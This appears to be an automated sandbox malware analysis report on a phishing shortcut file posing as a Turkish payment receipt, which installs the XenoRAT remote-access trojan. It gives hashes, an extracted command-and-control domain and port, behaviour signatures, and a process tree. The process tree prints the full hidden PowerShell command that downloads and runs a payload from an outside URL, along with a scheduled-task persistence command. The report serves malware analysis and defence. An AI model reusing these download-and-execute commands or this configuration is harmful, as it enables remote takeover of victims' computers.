Analysis

  max time kernel:   150s
  max time network:  153s
  platform:          windows10-2004_x64
  resource:          win10v2004-20240419-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         03/05/2024, 13:00

Static task:      static1
Behavioral task:  behavioral1
  Sample:    Dekontu/Odeme -(Mayis).lnk
  Resource:  win7-20240221-en
General

  Target:  Dekontu/Odeme -(Mayis).lnk
  Size:    2KB
  MD5:     2ad899ef7b0d361186d8487950b7e167
  SHA1:    151d04d656e68152cc2116b0837331a7df30eb27
  SHA256:  2ebd9ab34d58f221ce2034b9f43ad8b128fbc683dab962fbf6222b4eef2a3618
  SHA512:  2a84054d0f22a042eb2390dba4831eea02700334531e09a3e4ce3b7ca0db71d12ea7d0de30b19280ac0fe746002f4fc96a4904832c81b3dac6647c4a9a50b39b
Malware Config

Extracted
  https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif

Extracted: xenorat
  dns.requimacofradian.site
  Xeno_rat_nd8818g
  delay:         60000
  install_path:  appdata
  port:          1243
  startup_name:  uic
Signatures

Blocklisted process makes network request  (1 IoC)
  flow  pid   Process
  10    3856  PoWeRShElL.exe

Command and Scripting Interpreter: PowerShell  (1 TTP, 1 IoC)
  Run Powershell and hide display window.
  pid   Process
  3856  PoWeRShElL.exe

Downloads MZ/PE file

Checks computer location settings  (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                               Process
  Key value queried  \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation  screenbiwus.pif

Executes dropped EXE  (8 IoCs)
  pid   Process
  1172  screenbiwus.pif
  964   screenbiwus.pif
  4292  screenbiwus.pif
  4492  screenbiwus.pif
  2572  screenbiwus.pif
  3544  screenbiwus.pif
  1588  screenbiwus.pif
  2176  screenbiwus.pif

Suspicious use of SetThreadContext  (6 IoCs)
  description                          pid   Process          procid_target
  PID 1172 set thread context of 964   1172  screenbiwus.pif  92
  PID 1172 set thread context of 4292  1172  screenbiwus.pif  93
  PID 1172 set thread context of 4492  1172  screenbiwus.pif  94
  PID 2572 set thread context of 3544  2572  screenbiwus.pif  98
  PID 2572 set thread context of 1588  2572  screenbiwus.pif  99
  PID 2572 set thread context of 2176  2572  screenbiwus.pif  101

Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Program crash  (1 IoC)
  pid   pid_target  Process       procid_target
  4596  3544        WerFault.exe  98

Creates scheduled task(s)  (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  4444  schtasks.exe

Modifies registry class  (2 IoCs)
  description  ioc                                                                               Process
  Key created  \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings  OpenWith.exe
  Key created  \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings  PoWeRShElL.exe

Suspicious behavior: EnumeratesProcesses  (64 IoCs; identical rows collapsed, count in last column)
  pid   Process          entries
  3856  PoWeRShElL.exe   2
  4292  screenbiwus.pif  62

Suspicious use of AdjustPrivilegeToken  (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3856  PoWeRShElL.exe
  Token: SeDebugPrivilege  1172  screenbiwus.pif
  Token: SeDebugPrivilege  2572  screenbiwus.pif
  Token: SeDebugPrivilege  4292  screenbiwus.pif

Suspicious use of SetWindowsHookEx  (1 IoC)
  pid   Process
  2244  OpenWith.exe

Suspicious use of WriteProcessMemory  (59 IoCs; identical rows collapsed, count in last column)
  description                        pid   Process          procid_target  entries
  PID 4656 wrote to memory of 3856   4656  cmd.exe          86             2
  PID 3856 wrote to memory of 1172   3856  PoWeRShElL.exe   90             3
  PID 1172 wrote to memory of 964    1172  screenbiwus.pif  92             8
  PID 1172 wrote to memory of 4292   1172  screenbiwus.pif  93             8
  PID 1172 wrote to memory of 4492   1172  screenbiwus.pif  94             8
  PID 964 wrote to memory of 2572    964   screenbiwus.pif  97             3
  PID 2572 wrote to memory of 3544   2572  screenbiwus.pif  98             8
  PID 2572 wrote to memory of 1588   2572  screenbiwus.pif  99             8
  PID 2572 wrote to memory of 2176   2572  screenbiwus.pif  101            8
  PID 4292 wrote to memory of 4444   4292  screenbiwus.pif  115            3
Processes

Process tree (the bracketed number is the depth in the tree as reported by the sandbox; children are indented under their parent).

[1] C:\Windows\system32\cmd.exe  (PID 4656)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Dekontu\Odeme -(Mayis).lnk"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe  (PID 3856)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command srms-apr.dat;(new-object System.Net.WebClient).DownloadFile('https://www.dobiamfollollc.online/konzjrngodznhitsthjfxjydtjytddy/uiuGJRSgfzjzdgzdghstRgsgtesht/cfhfcg.pif','screenbiwus.pif');./'screenbiwus.pif';(get-item 'screenbiwus.pif').Attributes += 'Hidden';
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif  (PID 1172)
        Command line: "C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif"
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif  (PID 964)
          Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
          Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif  (PID 2572)
            Command line: "C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif"
            Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

          [6] C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif  (PID 3544)
              Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              Signatures: Executes dropped EXE

            [7] C:\Windows\SysWOW64\WerFault.exe  (PID 4596)
                Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 12
                Signatures: Program crash

          [6] C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif  (PID 1588)
              Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              Signatures: Executes dropped EXE

          [6] C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif  (PID 2176)
              Command line: C:\Users\Admin\AppData\Roaming\XenoManager\screenbiwus.pif
              Signatures: Executes dropped EXE

      [4] C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif  (PID 4292)
          Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\schtasks.exe  (PID 4444)
            Command line: "schtasks.exe" /Create /TN "uic" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2D74.tmp" /F
            Signatures: Creates scheduled task(s)

      [4] C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif  (PID 4492)
          Command line: C:\Users\Admin\AppData\Local\Temp\Dekontu\screenbiwus.pif
          Signatures: Executes dropped EXE

[1] C:\Windows\system32\OpenWith.exe  (PID 2244)
    Command line: C:\Windows\system32\OpenWith.exe -Embedding
    Signatures: Modifies registry class; Suspicious use of SetWindowsHookEx

[1] C:\Windows\SysWOW64\WerFault.exe  (PID 4444)
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3544 -ip 3544
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize:  706B
  MD5:       d95c58e609838928f0f49837cab7dfd2
  SHA1:      55e7139a1e3899195b92ed8771d1ca2c7d53c916
  SHA256:    0407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
  SHA512:    405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d

  Filesize:  243KB
  MD5:       f6839c83a19cfb9112997be29ba02a88
  SHA1:      b558ada6c8f1603b8c700a74afc33bfbb14ac713
  SHA256:    09d6f45a4cf61b2eaf9b715c712d6e61410a7d838b71e31fa4b12c012afb2d90
  SHA512:    0724132c9cbdd1394cc3e17d557c7c82b8e30b34b1adc207f7b77dc498b63e5c03768de88b261bd986cfe18ab8a70ff77c4dabc5b215d58a959287c7f38fdd8b

  Filesize:  60B
  MD5:       d17fe0a3f47be24a6453e9ef58c94641
  SHA1:      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256:    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512:    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Filesize:  1KB
  MD5:       cd6994537023694f4533ff4244156d8a
  SHA1:      b581d11e2cad75bd5b7e440169f423cb18117a40
  SHA256:    b03bd499a8ab96f583f7029110764a3a08ecd976f4e2ec9e7b74c414d20c6707
  SHA512:    f9d3f71138a6af0d0435d3b66b7277a92696050dc3f3fdfb2842f02d8bf2a948342101da4747e74d003c23dd13799d4940496043fad866b9bc2045de54ea9cd0